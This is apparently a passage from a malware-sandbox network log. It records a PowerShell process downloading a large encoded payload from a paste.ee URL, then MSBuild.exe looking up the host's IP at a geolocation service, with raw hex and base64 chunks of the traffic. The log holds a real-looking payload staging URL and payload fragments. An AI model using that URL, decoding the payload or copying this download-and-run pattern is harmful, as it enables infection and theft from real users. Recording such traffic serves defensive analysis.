                                                                                                                                  2025-04-28 11:24:35 UTC16384INData Raw: 19 25 ba 75 52 e4 39 e3 12 40 04 ac 07 4c 8b c3 71 85 c7 17 82 26 4c 18 fb 7d 17 8a 2e 0c 38 32 43 87 b9 e7 22 8b e4 0c 94 32 09 b4 93 40 64 2a 47 5c 68 da 9f 93 43 df 0c 8c 09 a0 70 39 d6 ab c7 0e 57 13 27 5c 42 1e 49 39 3b 64 e9 93 f2 c9 27 18 7b 56 0e d8 72 49 58 32 1c 87 a6 49 30 de 0c 35 92 0c 9d f1 95 4b 5d 60 ae 72 49 b7 05 0b cb 01 1c e2 1e 09 c9 06 42 30 8c 99 20 ba ed 78 0e 36 0e 9d 72 42 70 63 05 e2 fb 60 ac 90 0c 1c 9b c6 ba c0 39 c9 06 5d 0c 5e 60 3f 02 f2 ac b2 29 5a 2b 23 9b 19 22 95 da 4d f1 8a 79 c7 77 2f 89 8a 42 6b a6 4c 99 3a e0 93 06 4c 99 11 dc 47 4c 85 89 c1 57 90 82 0d 1c 92 64 c9 f9 64 c1 26 4e f8 70 64 92 b2 64 c9 d3 24 95 93 27 7c 9d 32 48 70 61 ed 83 24 9d b0 82 6a b0 64 c9 26 1c 19 32 42 38 c8 72 58 c1 92 1b e3 06 4c 98 a3 c2
                                                                                                                                  Data Ascii: %uR9@Lq&L}.82C"2@d*G\hCp9W'\BI9;d'{VrIX2I05K]`rIB0 x6rBpc`9]^`?)Z+#"Myw/BkL:LGLWdd&Npdd$'|2Hpa$jd&2B8rXL
                                                                                                                                  2025-04-28 11:24:35 UTC16384INData Raw: cb 59 a9 65 8a 2d b1 c5 65 58 8d f6 3a ff 00 ce 71 e5 9c c8 3f 0e 8c 3c 95 62 54 10 07 ef f9 67 59 26 39 5e 57 58 ca 12 69 af 81 db 14 8d a0 d7 7e 0f ce 3c a5 96 4a 5a e9 d4 73 8c bc d9 20 f4 e3 8c ce 1d 52 0e db 52 01 1f db 13 69 be 96 32 e7 49 05 2b 72 07 4a 18 a2 f6 ed 3f 96 66 b5 01 08 fa 4f 23 1c a4 88 b6 0d 0e 98 d1 43 52 28 3c df 6c ea 3e 92 1d 34 90 4d 3d 18 98 fa 90 1e 7a 63 26 b3 79 48 e2 1d c4 d1 c7 40 15 49 23 b6 33 6c bb e6 ba f3 8a aa 4d 91 c6 67 1a 94 b4 7b 91 c6 32 33 a3 6e 8c 90 df 18 c6 34 08 ac 58 f3 76 3d b1 55 4b 48 06 e0 aa 7b b1 a1 96 55 ed 7c 24 79 ea 67 53 b4 f2 40 f6 c6 7f 2a 68 8e c4 08 db ac 5f 61 99 86 e7 60 a0 8b aa eb 8c db 95 42 d1 04 73 9b ff 00 ac e1 76 38 6e c6 81 34 32 05 46 07 76 ef 8a c0 19 87 51 c9 ef 96 aa b3 30 fe
                                                                                                                                  Data Ascii: Ye-eX:q?<bTgY&9^WXi~<JZs RRi2I+rJ?fO#CR(<l>4M=zc&yH@I#3lMg{23n4Xv=UKH{U|$ygS@*h_a`Bsv8n42FvQ0
                                                                                                                                  2025-04-28 11:24:35 UTC16384INData Raw: 21 ab 21 37 db 06 58 ab 63 24 30 ca 62 56 1e e2 b2 a2 6f 9c 66 15 82 b1 4d 09 14 4d 16 e6 6a 39 51 55 0e 42 9b 18 97 ec 71 95 b6 f6 cb 0d bb 30 2c 93 91 6a f1 e2 4f 32 40 2e b1 18 6d 62 06 4c a3 7d f1 70 e0 c8 8f 6c 23 06 41 90 12 6b 18 72 79 e7 17 27 4c 74 0d 8c 1d 72 75 e7 25 64 93 26 1f cf 21 eb c6 49 06 4c 9d 39 c9 92 4c 35 47 e7 25 e4 38 c0 9d f1 e3 20 48 a7 14 fb e2 f7 c5 35 6a 18 b5 55 1f b6 66 00 a9 ef 7f 7c b1 14 b1 17 92 64 d8 46 17 14 d8 ab a9 e9 c6 4e d8 45 64 cb 0a 60 3f 38 7a e0 ef 90 11 cf 19 3b e4 ae 32 64 92 b2 5f 19 2c e1 19 20 bb c3 47 8c 70 83 6d d6 25 f1 88 10 48 e4 e3 a4 a5 14 81 d4 e2 28 2c 40 cb 67 8b c9 70 3e d8 a5 40 1b bf 7c 20 1e 07 7c 19 2e 87 ce 49 6c 8a 05 51 ed 95 9e 30 86 e3 21 62 d4 2b a7 b6 20 3b 64 ed 87 69 14 18 10 72
                                                                                                                                  Data Ascii: !!7Xc$0bVofMMj9QUBq0,jO2@.mbL}pl#Akry'Ltru%d&!IL9L5G%8 H5jUf|dFNEd`?8z;2d_, Gpm%H(,@gp>@| |.IlQ0!b+ ;dir
                                                                                                                                  2025-04-28 11:24:35 UTC16384INData Raw: a3 e4 75 fd 33 4f 88 fe 0b f0 89 16 97 4f 22 ea 5e 81 2f 60 0a ae 97 d7 be 73 f5 09 24 30 95 92 48 99 88 b0 51 c1 af d3 2e 56 55 2f 4c 73 6c 77 d8 ab b8 b7 4a f7 ce 9f 85 49 bb 50 35 05 36 c6 1c 03 5e ff 00 f0 65 9f c3 85 a0 f1 15 0f a7 f3 a3 90 ec b2 bd 0f 1c 8f d3 3a 32 7f 0e eb 5f f8 80 c6 b5 1c 12 10 6f b5 70 0f e7 99 37 97 d3 7e b8 2e af 4c 59 64 8c ee 5a 16 dc 74 cf 13 a9 85 52 77 88 b2 d8 3c b0 3c 67 a1 f1 9d 34 de 19 ac 5d 2e 9d ac ed 26 89 f8 1f ef 9e 6a 61 21 67 66 07 71 3e a2 47 43 92 e0 dc 1b f0 da 60 bc 39 65 0d 60 f4 cc ae 47 9a 4a 8d a7 1a 06 09 a7 76 71 b8 8e 79 35 f9 62 b4 fe 6c e5 be 9a f8 c7 1a d6 bd 31 1a 8d 25 3b 90 14 dd 0e dd 70 6a 34 c7 d1 3f 0d 1b 82 00 5e 4f 1c 65 11 c9 22 bc 66 22 37 21 e1 7f 3b fc f0 c9 34 ab c9 62 af 64 d5 7b
                                                                                                                                  Data Ascii: u3OO"^/`s$0HQ.VU/LslwJIP56^e:2_op7~.LYdZtRw<<g4].&ja!gfq>GC`9e`GJvqy5bl1%;pj4?^Oe"f"7!;4bd{
                                                                                                                                  2025-04-28 11:24:35 UTC16384INData Raw: 2c 9c b3 e8 b1 c0 1e d8 0c 9b 78 5f d7 0c 51 1a 3a e3 ea 23 be 56 cb c6 58 8c 45 1e a2 f9 c8 63 b2 48 bc 2c fc 3b fa a8 5d f0 39 c8 88 59 b8 c6 e2 ea b9 cb 13 ad 74 1d ce 1f 7d 9b 4a b1 10 6d 88 e3 24 86 db 91 c0 f7 c0 cf b8 f1 c6 56 4f 27 be 6a d9 3a 82 4b 7d 99 69 9b 8e 06 42 5b d4 41 a1 88 18 8e 9d 71 c3 03 f5 74 cc eb 58 0a 0b 37 06 eb 25 57 42 0e 0d fc 52 8a f9 c5 27 9e 72 e9 76 b0 b0 20 12 2c e1 43 68 dd 6c f6 ca cf d5 ef 80 93 78 69 c3 10 54 ee 1f b6 42 ef 23 70 3b 76 c3 e6 1a a2 01 c9 e6 11 f4 8a f7 ca e2 20 e1 a8 f0 71 88 07 9e 01 c1 bb a5 e4 1c f2 3a e5 12 74 3d 3a e5 91 9d cc 17 df a7 c6 03 44 0f 7c 11 37 97 28 60 01 03 19 ec 7b 87 5f 44 81 c8 e8 7b 65 92 28 6b 71 cf 17 78 03 c6 c6 f7 32 92 3b 0c b7 cb 15 4a cb 47 b1 3c e7 49 3e 98 b5 8d ba f1
                                                                                                                                  Data Ascii: ,x_Q:#VXEcH,;]9Yt}Jm$VO'j:K}iB[AqtX7%WBR'rv ,ChlxiTB#p;v q:t=:D|7(`{_D{e(kqx2;JG<I>
                                                                                                                                  2025-04-28 11:24:36 UTC16384INData Raw: 7c 1f cc 5b b2 47 c1 c0 48 aa eb 8d aa 44 12 37 db ed 97 fe 20 82 57 68 3e e4 62 25 49 45 4f a8 65 41 7f 9a 2c 8a ef 8f 70 64 ab 26 1f 49 1d fb 0c ab 8a f9 ef 9a 25 4d e7 92 00 03 81 ef 99 ca ed 03 6f 37 d7 33 cb 74 f1 f4 ae d8 1b 5c 8e c5 88 27 b6 33 5a f1 85 45 72 73 15 bd 25 fa 45 fb e1 35 d4 13 78 d2 91 5d 31 18 10 00 c1 16 c9 c9 67 f2 c6 0b cf 38 1e ba 0c 1a 40 d4 08 a1 cf 7c 17 ef 90 29 ee 31 a8 7d f2 ca 00 72 72 cf 2c 91 e9 1c e3 44 00 1c 8f b6 16 6e 6b 37 38 f5 db 36 f6 2b b9 63 31 95 14 71 51 36 73 7f 96 1e f5 ba b2 06 da 3b 1c 64 90 76 53 12 f7 6a e7 11 a3 37 c5 91 ef 8c 5a c5 f7 c8 93 76 38 5c 33 55 00 6f e3 09 af 6b cb df 90 08 e9 95 ed 0c b6 38 c2 f1 33 91 41 24 d8 c6 1c b0 37 44 61 da 83 8b e6 b1 4a b2 9a ed db 0c b1 2c 1a 99 54 9a 72 7e 2f
                                                                                                                                  Data Ascii: |[GHD7 Wh>b%IEOeA,pd&I%Mo73t\'3ZErs%E5x]1g8@|)1}rr,Dnk786+c1qQ6s;dvSj7Zv8\3Uok83A$7DaJ,Tr~/
                                                                                                                                  2025-04-28 11:24:36 UTC16384INData Raw: 7c 9a 8d 40 55 e8 15 12 c2 af 00 71 64 fb 5e 11 6e fa 34 1e 1b a4 d4 f8 74 3e 56 a3 6e bb 7b 29 8d 81 22 4b 34 b5 d8 7e 67 be 27 89 7f 0e 78 bf 83 c7 1b eb f4 86 15 97 e8 3e 62 b5 fe 84 d6 51 e1 7a 77 d4 f8 84 08 93 08 88 70 43 9e c6 ec 57 ce 75 3f 88 7c 63 c4 9e 79 b4 1a 8d 74 9a a8 d1 c8 dd 23 12 54 83 d3 f6 c5 9e f7 1c 44 d3 c8 c1 49 21 54 f0 18 9c 33 33 2e 9d b4 e6 8a 96 dc 5a b9 e9 8a c1 82 8b 24 8e 9f 03 2f 81 e3 fc 39 47 40 c4 9b dc 47 38 f2 b9 1b e1 2d be dd 9f e1 5f e2 4d 1f 80 c7 a9 33 e8 d6 59 dd 6a 39 28 5a f0 78 06 b8 be 33 6f 86 ff 00 13 4f 27 89 48 f1 86 86 39 9c 6e 11 b6 d2 39 3d 48 eb d7 3c 7e a5 87 98 1a b8 3d 2b 2d d2 eb 84 24 a1 e7 77 be 73 e5 7f 1a e3 f1 f1 b6 f9 3d bf 8c 78 7c 5f c5 1f c5 10 f8 7e 8b 5a d2 22 42 0c b2 c8 49 21 fd 56
                                                                                                                                  Data Ascii: |@Uqd^n4t>Vn{)"K4~g'x>bQzwpCWu?|cyt#TDI!T33.Z$/9G@G8-_M3Yj9(Zx3oO'H9n9=H<~=+-$ws=x|_~Z"BI!V
                                                                                                                                  2025-04-28 11:24:36 UTC16384INData Raw: 0d 29 ee 7e 31 73 9c 31 b7 f1 1e 1c 9e 18 b1 47 09 6d 46 d2 19 8f 6b ef d3 38 c4 04 b6 24 8a f9 bb f6 ce 86 b6 28 a3 94 3c 52 06 89 97 8a 15 46 87 f9 ca 35 1e 1f 34 50 45 21 da 7c d0 48 07 9a aa ff 00 7c 94 8a f4 9a 76 d5 ca 91 86 54 26 c9 76 a3 5c 65 12 87 09 b8 d9 40 2d 4d d6 ec b6 3d 26 a6 12 b4 8c cc ca 1b 69 60 6c 1c 71 03 f9 4b e6 c8 49 53 b7 ca 26 ff 00 3f 6c 7e 8f da 26 a8 da ed 99 9d ac 53 b5 f2 7f 3c 2c c1 63 62 20 66 27 ab 5d 81 ef 81 22 26 06 58 91 48 2d c1 3d 47 db 2e 8f 57 2e 9f 4c d0 85 42 b4 6c 91 8e 8c 59 06 b6 48 f4 41 0d d0 36 51 87 51 da 8e 62 6d 4b cc 1e 44 dd 18 27 69 50 7a 8e d7 8d e6 4b 31 b4 da 69 68 2b 74 f9 ca 61 dc 64 65 91 69 4f 5a f7 c0 ce 30 d1 46 d2 1d a8 ca a4 8b 26 ba 7e 78 ae 49 1b 5a a9 8d 1e f8 c0 6c 2c 11 45 11 fa 8c
                                                                                                                                  Data Ascii: )~1s1GmFk8$(<RF54PE!|H|vT&v\e@-M=&i`lqKIS&?l~&S<,cb f']"&XH-=G.W.LBlYHA6QQbmKD'iPzK1ih+tadeiOZ0F&~xIZl,E
                                                                                                                                  2025-04-28 11:24:36 UTC16384INData Raw: d9 ef f1 9a 83 0a a0 33 cf 5d aa 35 d6 d3 d3 db 31 4c 4a 0e 09 02 fb 66 d7 60 54 7b e6 3d 44 aa 63 a1 41 87 c7 5c 22 8e 1e b0 31 67 94 1b 60 2e ba f1 f6 ce 53 68 63 33 7e 2b 51 22 8d 30 21 88 ef c7 c7 e4 73 d3 e9 15 1f c4 1e 27 08 cb b6 cd af c8 cb 3c 67 c3 74 f3 e8 24 86 38 91 5d 81 aa 00 51 ac f4 70 b8 f2 ff 00 93 cb 2e 3e 55 e2 57 36 ad fc b5 20 33 1d a0 2f 55 ed 95 c5 2c f7 34 a6 70 b2 e9 90 24 6a d4 2f 9a aa f8 19 af c5 0e a7 4b a9 78 a7 45 56 50 00 65 15 c0 ce 74 0b f8 89 9b 83 b4 f3 bc f2 2f 3d 9c 66 c7 cf f9 2a 9d 76 a8 6a 34 d1 c8 59 9f 54 86 9d 4a d5 8f 7f d4 e4 d3 2a 38 91 20 d3 b6 a1 d8 76 b3 b4 fb d7 39 e8 7c 0b c2 74 32 be a4 eb 1c 30 68 eb 9e 36 f2 31 1a 3d 2e 8e 4d 2e 87 c3 e5 45 d4 48 7c af c4 0e 06 d2 7a 9f 7e 6b bf 6c dc b8 f3 de 4e 37
                                                                                                                                  Data Ascii: 3]51LJf`T{=DcA\"1g`.Shc3~+Q"0!s'<gt$8]Qp.>UW6 3/U,4p$j/KxEVPet/=f*vj4YTJ*8 v9|t20h61=.M.EH|z~klN7


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  3192.168.2.64969523.186.113.604436852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-04-28 11:24:37 UTC70OUTGET /d/xZVSQx4S/0 HTTP/1.1
                                                                                                                                  Host: paste.ee
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2025-04-28 11:24:38 UTC952INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                  Date: Mon, 28 Apr 2025 11:24:38 GMT
                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                  Content-Length: 124928
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Cache-Control: max-age=2592000
                                                                                                                                  X-Varnish: 43981049 43611395
                                                                                                                                  Age: 68
                                                                                                                                  Via: 1.1 varnish (Varnish/6.2)
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Strict-Transport-Security: max-age=63072000
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                                                  2025-04-28 11:24:38 UTC15432INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                  2025-04-28 11:24:38 UTC16384INData Raw: 7a 42 51 56 41 77 46 41 79 42 51 5a 41 4d 48 41 33 42 77 62 41 49 48 41 43 42 41 58 41 49 48 41 6c 42 77 63 41 63 48 41 76 42 67 63 41 49 45 41 77 41 67 4e 41 4d 44 41 63 46 47 41 41 41 43 41 4b 41 51 44 41 30 44 41 39 41 51 50 41 30 44 41 39 41 51 50 41 30 44 41 39 41 51 50 41 30 44 41 39 41 51 50 41 30 44 41 39 41 51 50 41 30 44 41 39 41 51 50 41 30 44 41 39 41 51 50 41 30 44 41 39 41 51 50 41 30 44 41 4b 41 51 44 41 51 47 41 79 42 51 61 41 49 47 41 79 42 51 5a 41 41 48 41 31 42 77 55 41 41 43 41 36 41 67 62 41 38 47 41 70 42 41 64 41 45 47 41 6a 42 51 61 41 77 47 41 77 42 41 63 41 45 45 41 4b 41 51 44 74 42 41 41 68 42 41 64 41 45 47 41 45 42 41 49 41 34 47 41 70 42 77 5a 41 38 47 41 4d 42 41 58 41 51 48 41 73 42 51 64 41 45 47 41 6d 42 51 5a 41 51 45
                                                                                                                                  Data Ascii: zBQVAwFAyBQZAMHA3BwbAIHACBAXAIHAlBwcAcHAvBgcAIEAwAgNAMDAcFGAAACAKAQDA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPA0DAKAQDAQGAyBQaAIGAyBQZAAHA1BwUAACA6AgbA8GApBAdAEGAjBQaAwGAwBAcAEEAKAQDtBAAhBAdAEGAEBAIA4GApBwZA8GAMBAXAQHAsBQdAEGAmBQZAQE
                                                                                                                                  2025-04-28 11:24:38 UTC16384INData Raw: 77 52 58 64 50 4a 32 59 41 51 58 64 77 52 58 64 50 52 45 41 30 56 48 63 75 6c 47 41 30 56 48 63 75 6c 6b 59 77 42 41 64 31 42 6e 62 4a 4a 32 59 41 51 58 64 76 6c 58 59 4d 64 48 5a 41 51 58 64 76 6c 58 59 4d 52 6d 63 68 39 6d 59 35 56 32 53 30 56 32 52 41 51 58 64 50 46 47 64 68 52 45 63 41 51 48 64 30 52 48 64 77 6c 6e 63 6a 56 47 52 41 51 33 63 76 68 55 65 43 4e 48 62 68 6c 47 64 75 56 47 5a 6c 4a 33 51 4a 42 41 64 7a 6c 47 54 6c 78 57 64 6b 39 57 54 6f 42 41 64 7a 6c 47 54 6c 52 32 62 4f 78 57 62 59 42 41 64 7a 56 57 64 78 56 6d 55 69 56 32 56 77 52 6e 52 41 51 6e 63 76 42 48 65 46 64 46 55 6d 5a 32 54 6b 56 57 5a 77 4e 46 41 30 4a 33 62 51 39 46 64 7a 39 47 53 41 51 6e 63 76 42 31 58 30 56 32 63 41 51 6e 63 6c 5a 6e 62 76 4e 45 41 30 4a 58 5a 7a 35 57
                                                                                                                                  Data Ascii: wRXdPJ2YAQXdwRXdPREA0VHculGA0VHculkYwBAd1BnbJJ2YAQXdvlXYMdHZAQXdvlXYMRmch9mY5V2S0V2RAQXdPFGdhREcAQHd0RHdwlncjVGRAQ3cvhUeCNHbhlGduVGZlJ3QJBAdzlGTlxWdk9WToBAdzlGTlR2bOxWbYBAdzVWdxVmUiV2VwRnRAQncvBHeFdFUmZ2TkVWZwNFA0J3bQ9Fdz9GSAQncvB1X0V2cAQnclZnbvNEA0JXZz5W
                                                                                                                                  2025-04-28 11:24:38 UTC16384INData Raw: 41 41 51 41 30 75 77 41 41 41 51 41 30 79 51 63 41 41 51 41 30 2b 51 6d 41 41 51 41 30 75 51 4b 41 41 51 41 30 75 51 54 41 41 51 41 30 4f 41 75 41 41 51 41 30 71 52 73 41 41 51 41 30 71 42 42 41 41 51 41 30 2b 67 78 41 41 77 41 7a 75 51 42 41 41 77 41 44 76 52 6e 41 41 77 41 2b 65 79 58 41 41 77 41 33 57 43 32 41 41 77 41 7a 65 67 64 41 41 51 41 30 2b 77 41 41 41 51 41 30 4f 67 77 41 41 51 41 30 79 51 6b 41 41 51 41 30 2b 41 48 41 41 51 41 30 75 43 36 41 41 51 41 30 57 78 4e 41 41 51 41 76 32 43 56 41 41 51 41 38 52 77 36 41 41 51 41 38 52 77 78 41 41 51 41 38 56 77 4b 41 41 51 41 38 56 51 44 41 41 51 41 38 56 67 52 41 41 41 41 55 58 43 43 41 41 41 41 55 6a 79 31 41 41 41 41 47 48 42 44 41 41 41 41 42 44 53 4c 41 41 41 41 6b 79 51 78 41 41 41 41 77 4a 69
                                                                                                                                  Data Ascii: AAQA0uwAAAQA0yQcAAQA0+QmAAQA0uQKAAQA0uQTAAQA0OAuAAQA0qRsAAQA0qBBAAQA0+gxAAwAzuQBAAwADvRnAAwA+eyXAAwA3WC2AAwAzegdAAQA0+wAAAQA0OgwAAQA0yQkAAQA0+AHAAQA0uC6AAQA0WxNAAQAv2CVAAQA8Rw6AAQA8RwxAAQA8VwKAAQA8VQDAAQA8VgRAAAAUXCCAAAAUjy1AAAAGHBDAAAABDSLAAAAkyQxAAAAwJi
                                                                                                                                  2025-04-28 11:24:38 UTC16384INData Raw: 69 69 45 41 54 56 31 49 41 41 67 50 34 41 41 41 6b 42 42 41 41 41 41 41 7a 64 6d 62 70 4a 48 64 54 4e 43 41 41 38 43 42 41 41 51 4e 4d 41 41 41 2b 4e 43 41 41 51 44 6f 41 41 41 41 73 42 51 42 41 41 41 41 41 6b 54 4d 7a 41 7a 4d 75 41 6a 4c 30 59 48 41 41 41 41 44 41 41 41 41 41 41 51 41 41 45 67 51 4b 4e 6c 51 41 41 41 41 30 43 46 52 42 42 46 52 42 42 46 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 64 6c 4e 56 5a 6a 4a 58 64 76 4e 58 5a 53 56 57 62 70 52 6e 62 31 4a 6c 4c 7a 56 32 59 79 56 33 62 7a 56 6d 55 75 30 57 5a 30 4e 58 65 54 4e 53 4f 34 41 54 5a 30 4d 54 4f 78 59 54 4e 6a 56 54 59 33 63 6a 59 39 34 57 5a 72 39 47 56 35 56 32 53 6a 6c 47 62 69 56 48 55 67 77 43 62 68 4a 48 64 31 56 6d 62 39 55 6d 63 31 52 48 62 31 4e 45 49 73 41 6a 4c 77 34 43
                                                                                                                                  Data Ascii: iiEATV1IAAgP4AAAkBBAAAAAzdmbpJHdTNCAA8CBAAQNMAAA+NCAAQDoAAAAsBQBAAAAAkTMzAzMuAjL0YHAAAADAAAAAAQAAEgQKNlQAAAA0CFRBBFRBBFAAAAAAAAAAAAAAIAdlNVZjJXdvNXZSVWbpRnb1JlLzV2YyV3bzVmUu0WZ0NXeTNSO4ATZ0MTOxYTNjVTY3cjY94WZr9GV5V2SjlGbiVHUgwCbhJHd1Vmb9Umc1RHb1NEIsAjLw4C
                                                                                                                                  2025-04-28 11:24:38 UTC16384INData Raw: 6f 63 41 42 41 41 77 44 2b 74 67 43 41 41 77 52 6f 41 48 41 36 4d 69 63 47 41 41 41 42 6a 43 63 41 6b 54 77 79 5a 43 4c 47 6f 77 41 2b 62 68 43 41 41 51 67 6f 59 42 63 41 55 67 34 79 5a 41 41 41 45 4d 4b 6d 59 41 41 41 45 4d 4b 41 45 42 41 41 6f 44 41 41 41 67 52 41 4d 41 4d 54 45 41 41 41 51 45 45 41 73 4d 78 41 63 41 41 41 41 41 41 51 45 41 41 41 6f 69 42 41 73 69 43 48 41 41 41 65 72 41 41 41 49 46 4b 41 6f 77 45 4b 41 41 41 7a 67 53 4a 51 34 64 35 76 63 52 43 52 6b 77 45 57 58 52 43 52 73 67 43 41 45 77 46 76 42 48 41 35 30 72 63 59 76 52 43 52 63 51 43 54 6f 42 6f 78 67 78 48 47 45 68 42 54 59 39 46 47 45 78 43 4b 41 41 41 4b 68 79 42 4b 41 41 41 7a 2f 32 46 48 45 52 42 52 51 38 4c 57 67 51 45 49 4d 68 31 56 67 51 45 48 4d 52 74 64 68 78 48 48 45 42
                                                                                                                                  Data Ascii: ocABAAwD+tgCAAwRoAHA6MicGAAABjCcAkTwyZCLGowA+bhCAAQgoYBcAUg4yZAAAEMKmYAAAEMKAEBAAoDAAAgRAMAMTEAAAQEEAsMxAcAAAAAAQEAAAoiBAsiCHAAAerAAAIFKAowEKAAAzgSJQ4d5vcRCRkwEWXRCRsgCAEwFvBHA50rcYvRCRcQCToBoxgxHGEhBTY9FGExCKAAAKhyBKAAAz/2FHERBRQ8LWgQEIMh1VgQEHMRtdhxHHEB
                                                                                                                                  2025-04-28 11:24:38 UTC16384INData Raw: 62 55 69 6f 77 42 77 45 76 4a 6e 47 6c 49 4b 42 52 6b 52 4a 69 43 48 41 54 55 6c 63 59 55 69 6f 4a 63 52 4a 69 43 48 41 54 38 67 63 57 55 53 41 41 41 77 50 4e 32 52 54 73 77 51 45 4d 4d 78 58 44 34 76 46 4b 41 41 41 42 69 69 46 77 42 51 42 69 4c 58 42 52 4d 67 2f 57 6f 41 41 41 45 49 4b 57 41 48 41 46 49 75 63 45 45 42 41 46 4d 68 42 41 41 41 76 6f 6f 41 41 41 38 31 62 47 41 41 41 56 2f 47 63 41 6f 52 78 79 64 51 45 49 6f 41 41 41 73 4b 4b 41 41 79 4b 41 41 41 41 46 4d 68 42 41 41 51 6c 6f 6b 51 45 4b 41 41 41 66 39 57 42 52 6f 41 41 41 73 4b 4b 57 77 79 43 52 73 77 45 42 34 76 46 4b 45 68 43 54 45 67 2f 55 6b 51 45 4a 4d 68 42 41 41 41 6c 6f 6f 41 41 42 45 77 62 4b 41 51 41 41 38 6d 43 41 41 77 2f 6f 59 77 51 73 67 51 45 49 4d 68 42 41 41 77 6b 6f 55 51
                                                                                                                                  Data Ascii: bUiowBwEvJnGlIKBRkRJiCHATUlcYUioJcRJiCHAT8gcWUSAAAwPN2RTswQEMMxXD4vFKAAABiiFwBQBiLXBRMg/WoAAAEIKWAHAFIucEEBAFMhBAAAvooAAA81bGAAAV/GcAoRxydQEIoAAAsKKAAyKAAAAFMhBAAQlokQEKAAAf9WBRoAAAsKKWwyCRswEB4vFKEhCTEg/UkQEJMhBAAAlooAABEwbKAQAA8mCAAw/oYwQsgQEIMhBAAwkoUQ
                                                                                                                                  2025-04-28 11:24:38 UTC11192INData Raw: 4e 63 77 44 73 67 41 44 4b 41 41 41 39 2b 6d 43 41 41 77 75 76 5a 41 41 41 51 41 4b 4c 6f 41 41 41 77 37 62 4b 41 41 41 37 2b 6d 42 41 41 41 42 6f 41 51 45 41 41 67 48 41 41 51 41 73 41 77 41 77 73 42 41 41 41 67 4b 47 41 77 4b 4b 59 41 41 41 4d 47 4b 46 51 77 41 45 41 41 41 73 73 6e 41 41 41 41 41 41 59 41 41 41 34 31 62 47 41 41 41 66 4e 6e 42 41 41 41 62 6f 6f 55 42 43 6f 55 42 43 55 51 45 59 77 53 42 52 55 77 45 45 41 41 41 77 73 6e 41 6c 77 43 42 52 51 77 45 42 34 50 41 41 45 41 42 67 51 77 4d 72 41 41 41 47 41 41 41 65 39 6d 42 41 41 77 58 7a 5a 41 41 41 77 47 4b 4b 56 67 41 4b 56 67 41 4a 63 42 4c 4a 30 41 42 41 41 77 4c 37 4a 41 4a 73 67 41 44 42 34 50 41 41 45 41 41 67 51 41 5a 73 63 77 43 42 34 76 46 44 41 51 45 41 41 51 48 41 41 41 41 42 43 51
                                                                                                                                  Data Ascii: NcwDsgADKAAA9+mCAAwuvZAAAQAKLoAAAw7bKAAA7+mBAAABoAQEAAgHAAQAsAwAwsBAAAgKGAwKKYAAAMGKFQwAEAAAssnAAAAAAYAAA41bGAAAfNnBAAAbooUBCoUBCUQEYwSBRUwEEAAAwsnAlwCBRQwEB4PAAEABgQwMrAAAGAAAe9mBAAwXzZAAAwGKKVgAKVgAJcBLJ0ABAAwL7JAJsgADB4PAAEAAgQAZscwCB4vFDAQEAAQHAAAABCQ


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  4192.168.2.649697104.21.112.14436720C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-04-28 11:24:40 UTC87OUTGET /xml/173.244.56.186 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2025-04-28 11:24:40 UTC856INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 28 Apr 2025 11:24:40 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 362
                                                                                                                                  Connection: close
                                                                                                                                  Server: cloudflare
                                                                                                                                  Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Cf-Ray: 937631cf995a720e-PHX
